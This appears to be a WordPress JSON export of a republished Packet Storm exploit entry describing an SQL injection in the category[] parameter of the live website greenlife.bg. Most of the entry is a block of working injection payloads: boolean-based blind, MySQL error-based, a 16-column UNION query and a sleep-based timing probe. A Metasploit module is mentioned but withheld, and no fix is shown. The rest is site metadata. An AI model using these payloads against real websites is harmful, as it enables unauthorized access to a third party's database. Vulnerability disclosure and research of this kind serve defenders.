{"id":22261,"date":"2025-10-17T15:50:13","date_gmt":"2025-10-17T15:50:13","guid":{"rendered":"http:\/\/localhost\/?p=22261"},"modified":"2025-10-17T15:50:13","modified_gmt":"2025-10-17T15:50:13","slug":"greenlifebg-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=22261","title":{"rendered":"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609"},"content":{"rendered":"

{“lastseen”:”2025-10-17T19:38:52″,”description”:”Greenlife.bg appears to suffer from a remote SQL injection vulnerability. It is unclear what vulnerable code base…”,”published”:”2025-10-16T00:00:00″,”modified”:”2025-10-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Greenlife.bg SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210609″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: greenlife-Copyright\u00a92025-Multiple-SQLi – Metasploit module – soon\\n # Author: nu11secur1ty\\n # Date: 10\/06\/2025\\n # Vendor: https:\/\/www.greenlife.bg\/bg\\n # Software: https:\/\/www.greenlife.bg\/bg\\n # Reference: https:\/\/portswigger.net\/web-security\/sql-injection\\n \\n ## Description:\\n The category%5B%5D parameter appears to be vulnerable to SQL injection\\n attacks. The payloads and 7609=07609 and and 2154=2162 were each submitted\\n in the category%5B%5D parameter. These two requests resulted in different\\n responses, indicating that the input is being incorporated into a SQL query\\n in an unsafe way.\\n Note that automated difference-based tests for SQL injection flaws can\\n often be unreliable and are prone to false positive results. You should\\n manually review the reported requests and responses to confirm whether a\\n vulnerability is actually present.\\n Additionally, the payload (select*from(select(sleep(20)))a) was submitted\\n in the category%5B%5D parameter. The application took 20206 milliseconds to\\n respond to the request, compared with 1413 milliseconds for the original\\n request, indicating that the injected SQL command caused a time delay.\\n \\n STATUS: HIGH-CRITICAL Vulnerability\\n \\n \\n [+]Payload:\\n – SQLi:\\n \\n “`SQLi\\n —\\n Parameter: category[] (GET)\\n Type: boolean-based blind\\n Title: AND boolean-based blind – WHERE or HAVING clause\\n Payload: category[]=1 and 2154=2162\\u0026category[]=3\\u0026category[]=5) AND\\n 6069=6069 AND (9510=9510\\u0026city[]=1\\u0026city[]=6\\u0026city[]=7\\u0026city[]=8\\u0026city[]=10\\n \\n Type: error-based\\n Title: MySQL \\u003e= 5.0 OR error-based – WHERE, HAVING, ORDER BY or GROUP\\n BY clause (FLOOR)\\n Payload: category[]=1 and 2154=2162\\u0026category[]=3\\u0026category[]=5) OR\\n (SELECT 6421 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT\\n (ELT(6421=6421,1))),0x7176717a71,FLOOR(RAND(0)*2))x FROM\\n INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND\\n (5033=5033\\u0026city[]=1\\u0026city[]=6\\u0026city[]=7\\u0026city[]=8\\u0026city[]=10\\n \\n Type: UNION query\\n Title: MySQL UNION query (UCHAR) – 16 columns\\n Payload: category[]=1 and 2154=2162\\u0026category[]=3\\u0026category[]=5) UNION\\n ALL SELECT\\n ‘UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,’UCHAR’,CONCAT(0x717a626b71,0x765652555971466244766b754c4e6263616e686c4877515a467876567069714c4e43504441625a4b,0x7176717a71),’UCHAR’,’UCHAR’,’UCHAR’#\\u0026city[]=1\\u0026city[]=6\\u0026city[]=7\\u0026city[]=8\\u0026city[]=10\\n —\\n “`\\n \\n [+]MSF exploit:\\n \\n “`rb\\n soon… but not will published\\n \\n “`\\n [+]Reproduce:\\n It is not present for security reasons!\\n \\n # Time spent:\\n 00:15:00\\n \\n \\n — \\n System Administrator – Infrastructure Engineer\\n Penetration Testing Engineer\\n Exploit developer at https:\/\/packetstormsecurity.com\/\\n https:\/\/cve.mitre.org\/index.html\\n https:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\n home page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\n hiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\n nu11secur1ty \\u003chttps:\/\/nu11secur1ty.blogspot.com\/\\u003e\\n nu11secur1ty \\u003chttps:\/\/nu11secur1ty.com\/\\u003e”,”sourceHref”:”https:\/\/packetstorm.news\/download\/210609″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/210609\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-10-17T19:38:52″,”description”:”Greenlife.bg appears to suffer from a remote SQL injection vulnerability. It is unclear what vulnerable code base…”,”published”:”2025-10-16T00:00:00″,”modified”:”2025-10-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Greenlife.bg SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210609″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: greenlife-Copyright\u00a92025-Multiple-SQLi – Metasploit module…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-22261","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=22261\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-10-17T19:38:52″,”description”:”Greenlife.bg appears to suffer from a remote SQL injection vulnerability. It is unclear what vulnerable code base…”,”published”:”2025-10-16T00:00:00″,”modified”:”2025-10-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Greenlife.bg SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210609″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: greenlife-Copyright\u00a92025-Multiple-SQLi – Metasploit module...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=22261\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-17T15:50:13+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=22261#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=22261\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609\",\"datePublished\":\"2025-10-17T15:50:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=22261\"},\"wordCount\":606,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=22261#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=22261\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=22261\",\"name\":\"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-10-17T15:50:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=22261#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=22261\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=22261#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=22261","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609 - zero redgem","og_description":"{“lastseen”:”2025-10-17T19:38:52″,”description”:”Greenlife.bg appears to suffer from a remote SQL injection vulnerability. It is unclear what vulnerable code base…”,”published”:”2025-10-16T00:00:00″,”modified”:”2025-10-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Greenlife.bg SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210609″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: greenlife-Copyright\u00a92025-Multiple-SQLi – Metasploit module...","og_url":"https:\/\/zero.redgem.net\/?p=22261","og_site_name":"zero redgem","article_published_time":"2025-10-17T15:50:13+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=22261#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=22261"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609","datePublished":"2025-10-17T15:50:13+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=22261"},"wordCount":606,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=22261#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=22261","url":"https:\/\/zero.redgem.net\/?p=22261","name":"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-10-17T15:50:13+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=22261#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=22261"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=22261#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Greenlife.bg SQL Injection_PACKETSTORM:210609"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/22261","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22261"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/22261\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}